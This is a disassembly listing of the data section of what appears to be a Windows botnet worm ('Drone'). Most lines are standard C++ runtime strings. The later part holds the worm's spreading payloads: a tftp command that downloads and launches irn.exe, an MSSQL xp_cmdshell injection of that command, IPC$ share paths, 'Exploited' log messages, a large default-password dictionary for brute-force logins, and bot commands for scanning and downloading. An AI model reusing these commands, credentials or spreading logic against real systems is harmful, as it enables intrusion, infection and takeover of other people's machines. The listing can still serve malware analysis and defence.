align 10h
aVectorConstruc db '`vector constructor iterator',27h,0 ; DATA XREF: J8@F_7_S:0041EC54�o
align 10h
aScalarDeleting db '`scalar deleting destructor',27h,0 ; DATA XREF: J8@F_7_S:0041EC50�o
align 10h
aDefaultConstru db '`default constructor closure',27h,0 ; DATA XREF: J8@F_7_S:0041EC4C�o
align 10h
aVectorDeleting db '`vector deleting destructor',27h,0 ; DATA XREF: J8@F_7_S:0041EC48�o
align 10h
aVbaseDestructo db '`vbase destructor',27h,0 ; DATA XREF: J8@F_7_S:0041EC44�o
align 4
aString db '`string',27h,0 ; DATA XREF: J8@F_7_S:0041EC40�o
align 10h
aLocalStaticGua db '`local static guard',27h,0 ; DATA XREF: J8@F_7_S:0041EC3C�o
align 4
aTypeof db '`typeof',27h,0 ; DATA XREF: J8@F_7_S:0041EC38�o
align 4
aVcall db '`vcall',27h,0 ; DATA XREF: J8@F_7_S:0041EC34�o
aVbtable db '`vbtable',27h,0 ; DATA XREF: J8@F_7_S:0041EC30�o
align 4
aVftable db '`vftable',27h,0 ; DATA XREF: J8@F_7_S:0041EC2C�o
align 4
asc_41EA24 db '^=',0 ; DATA XREF: J8@F_7_S:0041EC28�o
align 4
asc_41EA28 db '|=',0 ; DATA XREF: J8@F_7_S:0041EC24�o
align 4
asc_41EA2C db '&=',0 ; DATA XREF: J8@F_7_S:0041EC20�o
align 10h
asc_41EA30 db '<<=',0 ; DATA XREF: J8@F_7_S:0041EC1C�o
asc_41EA34 db '>>=',0 ; DATA XREF: J8@F_7_S:0041EC18�o
asc_41EA38 db '%=',0 ; DATA XREF: J8@F_7_S:0041EC14�o
align 4
asc_41EA3C db '/=',0 ; DATA XREF: J8@F_7_S:0041EC10�o
align 10h
asc_41EA40 db '-=',0 ; DATA XREF: J8@F_7_S:0041EC0C�o
align 4
asc_41EA44 db '+=',0 ; DATA XREF: J8@F_7_S:0041EC08�o
align 4
asc_41EA48 db '*=',0 ; DATA XREF: J8@F_7_S:0041EC04�o
align 4
asc_41EA4C db '||',0 ; DATA XREF: J8@F_7_S:0041EC00�o
align 10h
asc_41EA50 db '&&',0 ; DATA XREF: J8@F_7_S:0041EBFC�o
align 4
asc_41EA54: ; DATA XREF: J8@F_7_S:0041EBF8�o
unicode 0, <|>,0
asc_41EA58: ; DATA XREF: J8@F_7_S:0041EBF4�o
unicode 0, <^>,0
asc_41EA5C: ; DATA XREF: J8@F_7_S:0041EBF0�o
unicode 0, <~>,0
asc_41EA60 db '()',0 ; DATA XREF: J8@F_7_S:0041EBEC�o
align 4
asc_41EA64: ; DATA XREF: J8@F_7_S:0041EBE8�o
unicode 0, <,>,0
asc_41EA68 db '>=',0 ; DATA XREF: J8@F_7_S:0041EBE4�o
align 4
asc_41EA6C: ; DATA XREF: J8@F_7_S:0041EBE0�o
dw 3Eh
unicode 0, <>,0
asc_41EA70 db '<=',0 ; DATA XREF: J8@F_7_S:0041EBDC�o
align 4
asc_41EA74: ; DATA XREF: J8@F_7_S:0041EBD8�o
dw 3Ch
unicode 0, <>,0
asc_41EA78: ; DATA XREF: J8@F_7_S:0041EBD4�o
unicode 0, <%>,0
asc_41EA7C: ; DATA XREF: J8@F_7_S:0041EBD0�o
unicode 0, </>,0
asc_41EA80 db '->*',0 ; DATA XREF: J8@F_7_S:0041EBCC�o
asc_41EA84: ; DATA XREF: J8@F_7_S:0041EBC8�o
unicode 0, <&>,0
asc_41EA88: ; DATA XREF: J8@F_7_S:0041EBC4�o
unicode 0, <+>,0
asc_41EA8C: ; DATA XREF: J8@F_7_S:0041EBC0�o
unicode 0, <->,0
asc_41EA90 db '--',0 ; DATA XREF: J8@F_7_S:0041EBBC�o
align 4
asc_41EA94 db '++',0 ; DATA XREF: J8@F_7_S:0041EBB8�o
align 4
asc_41EA98: ; DATA XREF: J8@F_7_S:0041EBB4�o
unicode 0, <*>,0
asc_41EA9C db '->',0 ; DATA XREF: J8@F_7_S:0041EBB0�o
align 10h
aOperator db 'operator',0 ; DATA XREF: J8@F_7_S:0041EBAC�o
align 4
asc_41EAAC db '[]',0 ; DATA XREF: J8@F_7_S:0041EBA8�o
align 10h
asc_41EAB0 db '!=',0 ; DATA XREF: J8@F_7_S:0041EBA4�o
align 4
asc_41EAB4 db '==',0 ; DATA XREF: J8@F_7_S:0041EBA0�o
align 4
asc_41EAB8: ; DATA XREF: J8@F_7_S:0041EB9C�o
unicode 0, <!>,0
asc_41EABC db '<<',0 ; DATA XREF: J8@F_7_S:0041EB98�o
align 10h
asc_41EAC0 db '>>',0 ; DATA XREF: J8@F_7_S:0041EB94�o
align 4
aDelete_0 db ' delete',0 ; DATA XREF: J8@F_7_S:0041EB8C�o
aNew_0 db ' new',0 ; DATA XREF: J8@F_7_S:0041EB88�o
align 4
a__unaligned db '__unaligned',0 ; DATA XREF: J8@F_7_S:0041EB6C�o
a__restrict db '__restrict',0 ; DATA XREF: J8@F_7_S:0041EB68�o
align 4
; a__ptr64
a__ptr64 db '__ptr64',0 ; DATA XREF: J8@F_7_S:0041EB64�o
a__clrcall db '__clrcall',0 ; DATA XREF: J8@F_7_S:0041EB60�o
align 10h
a__fastcall db '__fastcall',0 ; DATA XREF: J8@F_7_S:0041EB5C�o
align 4
a__thiscall db '__thiscall',0 ; DATA XREF: J8@F_7_S:0041EB58�o
align 4
a__stdcall db '__stdcall',0 ; DATA XREF: J8@F_7_S:0041EB54�o
align 4
a__pascal db '__pascal',0 ; DATA XREF: J8@F_7_S:0041EB50�o
align 10h
a__cdecl db '__cdecl',0 ; DATA XREF: J8@F_7_S:0041EB4C�o
a__based db '__based(',0 ; DATA XREF: J8@F_7_S:0041EB48�o
align 8
dd offset a__based ; "__based("
dd offset a__cdecl ; "__cdecl"
dd offset a__pascal ; "__pascal"
dd offset a__stdcall ; "__stdcall"
dd offset a__thiscall ; "__thiscall"
dd offset a__fastcall ; "__fastcall"
dd offset a__clrcall ; "__clrcall"
dd offset a__ptr64 ; "__ptr64"
dd offset a__restrict ; "__restrict"
dd offset a__unaligned ; "__unaligned"
dd offset word_41D482
dd offset aTypeDescriptor ; " Type Descriptor'"
dd offset aBaseClassDescr ; " Base Class Descriptor at ("
dd offset aBaseClassArray ; " Base Class Array'"
dd offset aClassHierarchy ; " Class Hierarchy Descriptor'"
dd offset aCompleteObject ; " Complete Object Locator'"
dd offset aNew_0 ; " new"
dd offset aDelete_0 ; " delete"
dd offset byte_41D480
dd offset asc_41EAC0 ; ">>"
dd offset asc_41EABC ; "<<"
dd offset asc_41EAB8 ; "!"
dd offset asc_41EAB4 ; "=="
dd offset asc_41EAB0 ; "!="
dd offset asc_41EAAC ; "[]"
dd offset aOperator ; "operator"
dd offset asc_41EA9C ; "->"
dd offset asc_41EA98 ; "*"
dd offset asc_41EA94 ; "++"
dd offset asc_41EA90 ; "--"
dd offset asc_41EA8C ; "-"
dd offset asc_41EA88 ; "+"
dd offset asc_41EA84 ; "&"
dd offset asc_41EA80 ; "->*"
dd offset asc_41EA7C ; "/"
dd offset asc_41EA78 ; "%"
dd offset asc_41EA74 ; "<"
dd offset asc_41EA70 ; "<="
dd offset asc_41EA6C ; ">"
dd offset asc_41EA68 ; ">="
dd offset asc_41EA64 ; ","
dd offset asc_41EA60 ; "()"
dd offset asc_41EA5C ; "~"
dd offset asc_41EA58 ; "^"
dd offset asc_41EA54 ; "|"
dd offset asc_41EA50 ; "&&"
dd offset asc_41EA4C ; "||"
dd offset asc_41EA48 ; "*="
dd offset asc_41EA44 ; "+="
dd offset asc_41EA40 ; "-="
dd offset asc_41EA3C ; "/="
dd offset asc_41EA38 ; "%="
dd offset asc_41EA34 ; ">>="
dd offset asc_41EA30 ; "<<="
dd offset asc_41EA2C ; "&="
dd offset asc_41EA28 ; "|="
dd offset asc_41EA24 ; "^="
dd offset aVftable ; "`vftable'"
dd offset aVbtable ; "`vbtable'"
dd offset aVcall ; "`vcall'"
dd offset aTypeof ; "`typeof'"
dd offset aLocalStaticGua ; "`local static guard'"
dd offset aString ; "`string'"
dd offset aVbaseDestructo ; "`vbase destructor'"
dd offset aVectorDeleting ; "`vector deleting destructor'"
dd offset aDefaultConstru ; "`default constructor closure'"
dd offset aScalarDeleting ; "`scalar deleting destructor'"
dd offset aVectorConstruc ; "`vector constructor iterator'"
dd offset aVectorDestruct ; "`vector destructor iterator'"
dd offset aVectorVbaseCon ; "`vector vbase constructor iterator'"
dd offset aVirtualDisplac ; "`virtual displacement map'"
dd offset aEhVectorConstr ; "`eh vector constructor iterator'"
dd offset aEhVectorDestru ; "`eh vector destructor iterator'"
dd offset aEhVectorVbas_0 ; "`eh vector vbase constructor iterator'"
dd offset aCopyConstructo ; "`copy constructor closure'"
dd offset aUdtReturning ; "`udt returning'"
dd offset aEh ; "`EH"
dd offset aRtti ; "`RTTI"
dd offset aLocalVftable ; "`local vftable'"
dd offset aLocalVftableCo ; "`local vftable constructor closure'"
dd offset aNew ; " new[]"
dd offset aDelete ; " delete[]"
dd offset aOmniCallsig ; "`omni callsig'"
dd offset aPlacementDel_0 ; "`placement delete closure'"
dd offset aPlacementDelet ; "`placement delete[] closure'"
dd offset aManagedVecto_0 ; "`managed vector constructor iterator'"
dd offset aManagedVectorD ; "`managed vector destructor iterator'"
dd offset aEhVectorCopyCo ; "`eh vector copy constructor iterator'"
dd offset aEhVectorVbaseC ; "`eh vector vbase copy constructor itera"...
dd offset aDynamicInitial ; "`dynamic initializer for '"
dd offset aDynamicAtexitD ; "`dynamic atexit destructor for '"
dd offset aVectorCopyCons ; "`vector copy constructor iterator'"
dd offset aVectorVbaseCop ; "`vector vbase copy constructor iterator"...
dd offset aManagedVectorC ; "`managed vector copy constructor iterat"...
dd offset aLocalStaticThr ; "`local static thread guard'"
dd offset word_41D482
dd 86808006h, 808180h, 86031000h, 80828680h, 45050514h
dd 85854545h, 585h, 50803030h, 8008880h, 38272800h, 805750h
dd 30370007h, 88505030h, 20000000h, 80888028h, 80h
aHHhhXppwpp db '`h`hhh',8,8,7,'xppwpp',8,8,0
dw 800h
dd 7000800h, 8
aGetprocesswind db 'GetProcessWindowStation',0 ; DATA XREF: sub_40F524+C1�o
aGetuserobjecti db 'GetUserObjectInformationA',0 ; DATA XREF: sub_40F524+A9�o
align 4
aGetlastactivep db 'GetLastActivePopup',0 ; DATA XREF: sub_40F524+6D�o
align 4
aGetactivewindo db 'GetActiveWindow',0 ; DATA XREF: sub_40F524+58�o
aMessageboxa db 'MessageBoxA',0 ; DATA XREF: sub_40F524+46�o
aUser32_dll_0 db 'USER32.DLL',0 ; DATA XREF: sub_40F524+28�o
align 4
off_41ED94 dd offset sub_40F76B ; DATA XREF: sub_407979�r sub_407979+9�o ...
dd offset nullsub_2
dd offset nullsub_2
a_nextafter db '_nextafter',0
align 4
a_logb db '_logb',0
align 4
a_yn db '_yn',0
a_y1 db '_y1',0
a_y0 db '_y0',0
aFrexp db 'frexp',0
align 4
aFmod db 'fmod',0
align 10h
a_hypot db '_hypot',0
align 4
a_cabs db '_cabs',0
align 10h
aLdexp db 'ldexp',0
align 4
aFabs db 'fabs',0
align 10h
aSqrt db 'sqrt',0
align 4
aAtan2 db 'atan2',0
align 10h
aTanh db 'tanh',0
align 4
aCosh db 'cosh',0
align 10h
aSinh db 'sinh',0
align 4
dbl_41EE18 dq 0.0 ; DATA XREF: sub_40FB20+143�r
aSunmontuewedth db 'SunMonTueWedThuFriSat',0
align 4
aJanfebmaraprma db 'JanFebMarAprMayJunJulAugSepOctNovDec',0
align 10h
aE000 db 'e+000',0 ; DATA XREF: sub_410A54:loc_410B2C�o
align 4
dbl_41EE68 dq 4.195835e6 ; DATA XREF: sub_411394+F�r
dbl_41EE70 dq 3.145727e6 ; DATA XREF: sub_411394+6�r
aIsprocessorfea db 'IsProcessorFeaturePresent',0 ; DATA XREF: sub_4113D0+F�o
align 4
aKernel32 db 'KERNEL32',0 ; DATA XREF: sub_4113D0�o
align 10h
aConout db 'CONOUT$',0 ; DATA XREF: sub_41142B+E�o
a1Qnan db '1#QNAN',0 ; DATA XREF: sub_412AB1:loc_412BE0�o
align 10h
a1Inf db '1#INF',0 ; DATA XREF: sub_412AB1+103�o
align 4
a1Ind db '1#IND',0 ; DATA XREF: sub_412AB1+F4�o
align 10h
a1Snan db '1#SNAN',0 ; DATA XREF: sub_412AB1+DC�o
align 4
aBadAllocation db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424520�o
align 4
aScan_start db 'scan.start',0 ; DATA XREF: J8@F_7_S:0041C445�o
align 4
aScan_stop db 'scan.stop',0 ; DATA XREF: J8@F_7_S:0041C461�o
byte_41EEEE db 0 ; DATA XREF: sub_41A9DE+9C�o
byte_41EEEF db 0 ; DATA XREF: sub_41A9DE+A8�o
dword_41EEF0 dd 6E616373h, 6174732Eh, 7374h ; DATA XREF: J8@F_7_S:0041C47D�o
dword_41EEFC dd 252E6425h, 64252E64h, 64252Eh ; DATA XREF: J8@F_7_S:00413A77�o
byte_41EF08 db 25h, 73h, 0 ; DATA XREF: J8@F_7_S:00413BB9�o
byte_41EF0B db 0 ; DATA XREF: J8@F_7_S:off_424650�o
byte_41EF0C db 25h, 73h, 0 ; DATA XREF: J8@F_7_S:00413CC9�o
byte_41EF0F db 0 ; DATA XREF: J8@F_7_S:0041BB02�o
dword_41EF10 dd 7325h ; DATA XREF: J8@F_7_S:00413DB3�o
byte_41EF14 db 25h, 73h, 0 ; DATA XREF: J8@F_7_S:00413EC2�o
byte_41EF17 db 0 ; DATA XREF: J8@F_7_S:loc_41C061�o
dword_41EF18 dd 20646162h, 6F6C6C61h, 69746163h, 6E6Fh ; DATA XREF: J8@F_7_S:00424524�o
aTftpISGetIrn_e db 'tftp -i %s GET irn.exe&start irn.exe&exit',0Dh,0Ah,0
aBadAllocatio_0 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:004245D8�o
align 4
dword_41EF64 dd 5C0D0A00h ; DATA XREF: sub_41A5C1+1F�r
dword_41EF68 dd 2E2F5Fh ; DATA XREF: sub_41A5C1+27�r
dword_41EF6C dd 0 ; DATA XREF: sub_41A5C1+2C�o
dword_41EF70 dd 0 ; DATA XREF: sub_41A5C1+51�o
aHttpSDS db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+F1�o
aHttpSDS_0 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A5C1+162�o
aBadAllocatio_1 db 'bad allocation',0
align 4
aWindowsNt42000 db 'Windows NT4, 2000 (SP0-SP4)',0
aWindowsXpSp0Sp db 'Windows XP (SP0+SP1)',0 ; DATA XREF: J8@F_7_S:00424634�o
align 4
aIpc:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
dd 2 dup(0)
aIpc_0:
unicode 0, <\IPC$>,0
unicode 0, <\\>,0
align 4
a_: ; DATA XREF: sub_41A9DE+57�o
unicode 0, <.>,0
aSIpc db '\\%s\ipc$',0 ; DATA XREF: sub_41A9DE+76�o
align 4
aSPipeBrowser db '\\%s\pipe\browser',0 ; DATA XREF: sub_41A9DE+CA�o
align 4
dword_41F02C dd 4B324FC8h, 1D31670h, 475A7812h, 88E16EBFh, 0 ; DATA XREF: sub_41A9DE+191�o
dword_41F040 dd 8A885D04h, 11C91CEBh, 8E89Fh, 6048102Bh, 3 dup(0)
; DATA XREF: sub_41A9DE+1AC�o
dd 2EBh, 0
aHttpSDS_1 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+3D3�o
aHttpSDS_2 db 'http://%s:%d/%s',0 ; DATA XREF: sub_41A9DE+451�o
aSExploitedS_ db '%s: Exploited: %s.',0 ; DATA XREF: sub_41A9DE+786�o
align 4
aBadAllocatio_2 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424648�o
align 4
aSa db 'sa',0 ; DATA XREF: sub_41B1A0+55�o
align 4
aRoot db 'root',0 ; DATA XREF: sub_41B1A0+5C�o
align 4
aAdmin db 'admin',0 ; DATA XREF: sub_41B1A0+63�o
align 4
aDriverSqlServe db 'DRIVER={SQL Server};SERVER=%s,%d;UID=%s;PWD=%s;%s',0
; DATA XREF: sub_41B1A0+10C�o
align 10h
; aExecMaster(long long, *)
aExecMaster__xp db 'EXEC master..xp_cmdshell ',27h,'tftp -i %s GET irn.exe&start irn.exe'
; DATA XREF: sub_41B1A0+197�o
db '&exit',0Dh,0Ah
db 27h,0
align 4
aSExploitedS__0 db '%s: Exploited %s.',0 ; DATA XREF: sub_41B1A0+1F1�o
align 4
aAdministrator db 'administrator',0 ; DATA XREF: J8@F_7_S:00424654�o
align 4
aAdministrador db 'administrador',0 ; DATA XREF: J8@F_7_S:00424658�o
align 4
aAdministrateur db 'administrateur',0 ; DATA XREF: J8@F_7_S:0042465C�o
align 4
aAdministrat db 'administrat',0 ; DATA XREF: J8@F_7_S:00424660�o
aAdmins db 'admins',0 ; DATA XREF: J8@F_7_S:00424664�o
align 10h
aAdmin_0 db 'admin',0 ; DATA XREF: J8@F_7_S:00424668�o
align 4
aAdm db 'adm',0 ; DATA XREF: J8@F_7_S:0042466C�o
aPassword1 db 'password1',0 ; DATA XREF: J8@F_7_S:00424670�o
align 4
aPassword db 'password',0 ; DATA XREF: J8@F_7_S:00424674�o
align 4
aPasswd db 'passwd',0 ; DATA XREF: J8@F_7_S:00424678�o
align 4
aPass1234 db 'pass1234',0 ; DATA XREF: J8@F_7_S:0042467C�o
align 4
aPass db 'pass',0 ; DATA XREF: J8@F_7_S:00424680�o
align 10h
aPwd db 'pwd',0 ; DATA XREF: J8@F_7_S:00424684�o
a007 db '007',0 ; DATA XREF: J8@F_7_S:00424688�o
a1: ; DATA XREF: J8@F_7_S:0042468C�o
unicode 0, <1>,0
a12 db '12',0 ; DATA XREF: J8@F_7_S:00424690�o
align 10h
a123 db '123',0 ; DATA XREF: J8@F_7_S:00424694�o
a1234 db '1234',0 ; DATA XREF: J8@F_7_S:00424698�o
align 4
a12345 db '12345',0 ; DATA XREF: J8@F_7_S:0042469C�o
align 4
a123456 db '123456',0 ; DATA XREF: J8@F_7_S:004246A0�o
align 4
a1234567 db '1234567',0 ; DATA XREF: J8@F_7_S:004246A4�o
a12345678 db '12345678',0 ; DATA XREF: J8@F_7_S:004246A8�o
align 10h
a123456789 db '123456789',0 ; DATA XREF: J8@F_7_S:004246AC�o
align 4
a1234567890 db '1234567890',0 ; DATA XREF: J8@F_7_S:004246B0�o
align 4
a2000 db '2000',0 ; DATA XREF: J8@F_7_S:004246B4�o
align 10h
a2001 db '2001',0 ; DATA XREF: J8@F_7_S:004246B8�o
align 4
a2002 db '2002',0 ; DATA XREF: J8@F_7_S:004246BC�o
align 10h
a2003 db '2003',0 ; DATA XREF: J8@F_7_S:004246C0�o
align 4
a2004 db '2004',0 ; DATA XREF: J8@F_7_S:004246C4�o
align 10h
aTest db 'test',0 ; DATA XREF: J8@F_7_S:004246C8�o
align 4
aGuest db 'guest',0 ; DATA XREF: J8@F_7_S:004246CC�o
align 10h
aNone db 'none',0 ; DATA XREF: J8@F_7_S:004246D0�o
align 4
aDemo db 'demo',0 ; DATA XREF: J8@F_7_S:004246D4�o
align 10h
aUnix db 'unix',0 ; DATA XREF: J8@F_7_S:004246D8�o
align 4
aLinux db 'linux',0 ; DATA XREF: J8@F_7_S:004246DC�o
align 10h
aChangeme db 'changeme',0 ; DATA XREF: J8@F_7_S:004246E0�o
align 4
aDefault db 'default',0 ; DATA XREF: J8@F_7_S:004246E4�o
aSystem_0 db 'system',0 ; DATA XREF: J8@F_7_S:004246E8�o
align 4
aServer db 'server',0 ; DATA XREF: J8@F_7_S:004246EC�o
align 4
aRoot_0 db 'root',0 ; DATA XREF: J8@F_7_S:004246F0�o
align 4
aNull_1 db 'null',0 ; DATA XREF: J8@F_7_S:004246F4�o
align 4
aQwerty db 'qwerty',0 ; DATA XREF: J8@F_7_S:004246F8�o
align 4
aMail db 'mail',0 ; DATA XREF: J8@F_7_S:004246FC�o
align 4
aOutlook db 'outlook',0 ; DATA XREF: J8@F_7_S:00424700�o
aWeb db 'web',0 ; DATA XREF: J8@F_7_S:00424704�o
aWww db 'www',0 ; DATA XREF: J8@F_7_S:00424708�o
aInternet db 'internet',0 ; DATA XREF: J8@F_7_S:0042470C�o
align 10h
aAccounts db 'accounts',0 ; DATA XREF: J8@F_7_S:00424710�o
align 4
aAccounting db 'accounting',0 ; DATA XREF: J8@F_7_S:00424714�o
align 4
aHome db 'home',0 ; DATA XREF: J8@F_7_S:00424718�o
align 10h
aHomeuser db 'homeuser',0 ; DATA XREF: J8@F_7_S:0042471C�o
align 4
aUser db 'user',0 ; DATA XREF: J8@F_7_S:00424720�o
align 4
aOem db 'oem',0 ; DATA XREF: J8@F_7_S:00424724�o
aOemuser db 'oemuser',0 ; DATA XREF: J8@F_7_S:00424728�o
aOeminstall db 'oeminstall',0 ; DATA XREF: J8@F_7_S:0042472C�o
align 4
aWindows db 'windows',0 ; DATA XREF: J8@F_7_S:00424730�o
aWin98 db 'win98',0 ; DATA XREF: J8@F_7_S:00424734�o
align 4
aWin2k db 'win2k',0 ; DATA XREF: J8@F_7_S:00424738�o
align 4
aWinxp db 'winxp',0 ; DATA XREF: J8@F_7_S:0042473C�o
align 4
aWinnt db 'winnt',0 ; DATA XREF: J8@F_7_S:00424740�o
align 4
aWin2000 db 'win2000',0 ; DATA XREF: J8@F_7_S:00424744�o
aQaz db 'qaz',0 ; DATA XREF: J8@F_7_S:00424748�o
aAsd db 'asd',0 ; DATA XREF: J8@F_7_S:0042474C�o
aZxc db 'zxc',0 ; DATA XREF: J8@F_7_S:00424750�o
aQwe db 'qwe',0 ; DATA XREF: J8@F_7_S:00424754�o
aBob db 'bob',0 ; DATA XREF: J8@F_7_S:00424758�o
aJen db 'jen',0 ; DATA XREF: J8@F_7_S:0042475C�o
aJoe db 'joe',0 ; DATA XREF: J8@F_7_S:00424760�o
aFred db 'fred',0 ; DATA XREF: J8@F_7_S:00424764�o
align 10h
aBill db 'bill',0 ; DATA XREF: J8@F_7_S:00424768�o
align 4
aMike db 'mike',0 ; DATA XREF: J8@F_7_S:0042476C�o
align 10h
aJohn db 'john',0 ; DATA XREF: J8@F_7_S:00424770�o
align 4
aPeter db 'peter',0 ; DATA XREF: J8@F_7_S:00424774�o
align 10h
aLuke db 'luke',0 ; DATA XREF: J8@F_7_S:00424778�o
align 4
aSam db 'sam',0 ; DATA XREF: J8@F_7_S:0042477C�o
aSue db 'sue',0 ; DATA XREF: J8@F_7_S:00424780�o
aSusan db 'susan',0 ; DATA XREF: J8@F_7_S:00424784�o
align 4
aPeter_0 db 'peter',0 ; DATA XREF: J8@F_7_S:00424788�o
align 10h
aBrian db 'brian',0 ; DATA XREF: J8@F_7_S:0042478C�o
align 4
aLee db 'lee',0 ; DATA XREF: J8@F_7_S:00424790�o
aNeil db 'neil',0 ; DATA XREF: J8@F_7_S:00424794�o
align 4
aIan db 'ian',0 ; DATA XREF: J8@F_7_S:00424798�o
aChris db 'chris',0 ; DATA XREF: J8@F_7_S:0042479C�o
align 10h
aEric db 'eric',0 ; DATA XREF: J8@F_7_S:004247A0�o
align 4
aGeorge db 'george',0 ; DATA XREF: J8@F_7_S:004247A4�o
align 10h
aKate db 'kate',0 ; DATA XREF: J8@F_7_S:004247A8�o
align 4
aBob_0 db 'bob',0 ; DATA XREF: J8@F_7_S:004247AC�o
aKatie db 'katie',0 ; DATA XREF: J8@F_7_S:004247B0�o
align 4
aMary db 'mary',0 ; DATA XREF: J8@F_7_S:004247B4�o
align 4
aLogin db 'login',0 ; DATA XREF: J8@F_7_S:004247B8�o
align 4
aLoginpass db 'loginpass',0 ; DATA XREF: J8@F_7_S:004247BC�o
align 10h
aTechnical db 'technical',0 ; DATA XREF: J8@F_7_S:004247C0�o
align 4
aBackup db 'backup',0 ; DATA XREF: J8@F_7_S:004247C4�o
align 4
aExchange db 'exchange',0 ; DATA XREF: J8@F_7_S:004247C8�o
align 10h
aFuck db 'fuck',0 ; DATA XREF: J8@F_7_S:004247CC�o
align 4
aBitch db 'bitch',0 ; DATA XREF: J8@F_7_S:004247D0�o
align 10h
aSlut db 'slut',0 ; DATA XREF: J8@F_7_S:004247D4�o
align 4
aSex db 'sex',0 ; DATA XREF: J8@F_7_S:004247D8�o
aGod db 'god',0 ; DATA XREF: J8@F_7_S:004247DC�o
aHell db 'hell',0 ; DATA XREF: J8@F_7_S:004247E0�o
align 4
aHello db 'hello',0 ; DATA XREF: J8@F_7_S:004247E4�o
align 10h
aDomain db 'domain',0 ; DATA XREF: J8@F_7_S:004247E8�o
align 4
aDomainpass db 'domainpass',0 ; DATA XREF: J8@F_7_S:004247EC�o
align 4
aDomainpassword db 'domainpassword',0 ; DATA XREF: J8@F_7_S:004247F0�o
align 4
aDatabase db 'database',0 ; DATA XREF: J8@F_7_S:004247F4�o
align 10h
aAccess db 'access',0 ; DATA XREF: J8@F_7_S:004247F8�o
align 4
aDbpass db 'dbpass',0 ; DATA XREF: J8@F_7_S:004247FC�o
align 10h
aDbpassword db 'dbpassword',0 ; DATA XREF: J8@F_7_S:00424800�o
align 4
aDatabasepass db 'databasepass',0 ; DATA XREF: J8@F_7_S:00424804�o
align 4
aData db 'data',0 ; DATA XREF: J8@F_7_S:00424808�o
align 4
aDatabasepasswo db 'databasepassword',0 ; DATA XREF: J8@F_7_S:0042480C�o
align 4
aDb1 db 'db1',0 ; DATA XREF: J8@F_7_S:00424810�o
aDb2 db 'db2',0 ; DATA XREF: J8@F_7_S:00424814�o
aDb1234 db 'db1234',0 ; DATA XREF: J8@F_7_S:00424818�o
align 4
aSa_0 db 'sa',0 ; DATA XREF: J8@F_7_S:0042481C�o
align 4
aSql db 'sql',0 ; DATA XREF: J8@F_7_S:00424820�o
aSqlpassoainsta db 'sqlpassoainstall',0 ; DATA XREF: J8@F_7_S:00424824�o
align 4
aOrainstall db 'orainstall',0 ; DATA XREF: J8@F_7_S:00424828�o
align 10h
aOracle db 'oracle',0 ; DATA XREF: J8@F_7_S:0042482C�o
align 4
aIbm db 'ibm',0 ; DATA XREF: J8@F_7_S:00424830�o
aCisco db 'cisco',0 ; DATA XREF: J8@F_7_S:00424834�o
align 4
aDell db 'dell',0 ; DATA XREF: J8@F_7_S:00424838�o
align 4
aCompaq db 'compaq',0 ; DATA XREF: J8@F_7_S:0042483C�o
align 4
aSiemens db 'siemens',0 ; DATA XREF: J8@F_7_S:00424840�o
aHp db 'hp',0 ; DATA XREF: J8@F_7_S:00424844�o
align 10h
aNokia db 'nokia',0 ; DATA XREF: J8@F_7_S:00424848�o
align 4
aXp db 'xp',0 ; DATA XREF: J8@F_7_S:0042484C�o
align 4
aControl db 'control',0 ; DATA XREF: J8@F_7_S:00424850�o
aOffice db 'office',0 ; DATA XREF: J8@F_7_S:00424854�o
align 4
aBlank db 'blank',0 ; DATA XREF: J8@F_7_S:00424858�o
align 4
aWinpass db 'winpass',0 ; DATA XREF: J8@F_7_S:0042485C�o
aMain db 'main',0 ; DATA XREF: J8@F_7_S:00424860�o
align 4
aLan db 'lan',0 ; DATA XREF: J8@F_7_S:00424864�o
aInternet_0 db 'internet',0 ; DATA XREF: J8@F_7_S:00424868�o
align 4
aIntranet db 'intranet',0 ; DATA XREF: J8@F_7_S:0042486C�o
align 10h
aStudent db 'student',0 ; DATA XREF: J8@F_7_S:00424870�o
aTeacher db 'teacher',0 ; DATA XREF: J8@F_7_S:00424874�o
aStaff db 'staff',0 ; DATA XREF: J8@F_7_S:00424878�o
align 4
aBadAllocatio_3 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:0042464C�o
align 4
aHardwareDescri db 'HARDWARE\DESCRIPTION\System\CentralProcessor\0',0
; DATA XREF: sub_41A391+21�o
align 4
aMhz db '~MHz',0 ; DATA XREF: sub_41A391+4A�o
align 10h
aProcessornames db 'ProcessorNameString',0 ; DATA XREF: sub_41A391+6D�o
aS_7 db '%s',0 ; DATA XREF: sub_41A391+AD�o
align 4
aSC_0 db '%s%c',0 ; DATA XREF: sub_41A391+112�o
align 10h
aUnknown db 'Unknown',0 ; DATA XREF: sub_41A391+165�o
aHardwareDesc_0 db 'HARDWARE\DESCRIPTION\System\CentralProcessor\%i',0
; DATA XREF: sub_41A391+1B7�o
aSysinfo db 'sysinfo',0 ; DATA XREF: J8@F_7_S:0041C3FF�o
aNetinfo db 'netinfo',0 ; DATA XREF: J8@F_7_S:0041C41B�o
aBadAllocatio_4 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424880�o
align 4
aHttp db 'http',0 ; DATA XREF: J8@F_7_S:0041C3E3�o
align 10h
aBadAllocatio_5 db 'bad allocation',0 ; DATA XREF: J8@F_7_S:00424884�o
align 10h
aDl db 'DL',0
align 4
aDownload db 'download',0 ; DATA XREF: J8@F_7_S:0041C3AB�o
align 10h
aUpdate db 'update',0 ; DATA XREF: J8@F_7_S:0041C3C7�o
align 4
aMozilla5_0 db 'Mozilla/5.0',0 ; DATA XREF: J8@F_7_S:0041B958�o
aDlDownloadingS db 'DL: Downloading %s to %s',0 ; DATA XREF: J8@F_7_S:0041B976�o
align 10h
aDlFailedBadLoc db 'DL: Failed; Bad Location.',0 ; DATA XREF: J8@F_7_S:loc_41BAEF�o
align 4
aDlDownloadSIBy db 'DL: Download %s (%i Bytes) finished in %i seconds (%iKB/s)',0
; DATA XREF: J8@F_7_S:0041BA7B�o
align 4
aMainUninstalli db 'Main: Uninstalling Drone',0 ; DATA XREF: J8@F_7_S:0041BACC�o
align 4
aDlFailedToUpda db 'DL: Failed To Update',0 ; DATA XREF: J8@F_7_S:loc_41BAF6�o
align 4
aDlErrorExecuti db 'DL: Error Executing File.',0 ; DATA XREF: J8@F_7_S:0041BB12�o
align 4
